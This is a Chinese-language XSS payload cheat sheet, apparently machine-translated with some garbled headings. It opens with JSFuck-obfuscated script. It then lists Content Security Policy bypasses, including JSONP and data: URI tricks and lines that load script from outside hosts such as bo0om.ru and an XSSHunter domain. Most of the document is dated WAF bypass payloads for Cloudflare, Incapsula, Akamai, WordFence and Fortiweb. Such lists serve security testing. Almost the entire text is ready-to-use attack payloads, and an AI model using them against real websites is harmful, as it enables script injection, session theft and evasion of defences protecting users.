<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
使用jsfuck绕过 旁路使用jsfuck函数
1 [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
CSP旁路 检查上的CSPhttps://csp-evaluator.withgoogle.com 和后:如何使用Google的CSP评估器绕过CSP
使用Google提供的JSONP绕过CSP(Trick by@apfeifer27 ) //google.com/complete/search?client=chrome&jsonp=alert(1);
1 <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
更多 JSONP 端点 :
适用于CSP,例如Content-Security-Policy: default-src 'self' 'unsafe-inline';,此处为POC
1 2 3 script=document.createElement('script'); script.src='//bo0om.ru/csp.js'; window.frames[0].document.head.appendChild(script);
1 2 // CSP Bypass with Inline and Eval d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
适用于CSP,例如script-src self
1 <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
适用于CSP,例如script-src 'self' data: 正如官方警告的那样mozilla文档 。
1 <script src="data:,alert(1)">/</script>
通用WAF旁路 2021年1月25日 1 2 <svg/onrandom=random onload=confirm(1)> <video onnull=null onmouseover=confirm(1)>
2020 年 4 月 21 日 1 <svg/OnLoad="`${prompt``}`">
供应 2019 年 08 月 归档 1 <svg/onload=%26nbsp;alert`bohdan`+
供应 2019 年 06 月 归档 1 1'"><img/src/onerror=.1|alert``>
供应 2019 年 06 月 归档 1 2 3 <svg onload=prompt%26%230000000040document.domain)> <svg onload=prompt%26%23x000000028;document.domain)> xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
云 耀斑 XSS 旁路 - 2019 年 3 月 22 日 ( 作者 :@RakeshMane10 ) 1 <svg/onload=alert()//
Cloudflare XSS旁路-2018年2月27日 1 <a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
Chrome审计员-2018年8月9日 1 </script><svg><script>alert(1)-%26apos%3B
@brutelogic -提供的实例https://brutelogic.com.br/xss.php
Incapsula WAF旁路通过@警报 - 供应2018年03月归档 1 2 3 anythinglr00</script><script>alert(document.domain)</script>uxldz anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
Incapsula WAF旁路通过@c0d3G33k - 供应2018年09月归档 1 <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
Incapsula WAF旁路通过@戴维秒 - 供应2019年05月归档 1 <svg onload\r\n=$.globalEval("al"+"ert()");>
Akamai WAF绕过@泽亚诺 - 供应2018年06月归档 1 ?"></script><base%20c%3D=href%3Dhttps:\mysite>
Akamai WAF绕过@s0md3v - 供应2018年10月归档 1 <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
WordFence WAF绕过依据@野兽逻辑 - 供应2018年09月归档 1 <a href=javascript:alert(1)>
Fortiweb WAF绕过@雷扎杜蒂 - 供应2019年07月归档 1 \u003e\u003c\u0068\u0031 onclick=alert('1')\u003e
实验室
参考文献
微信
支付宝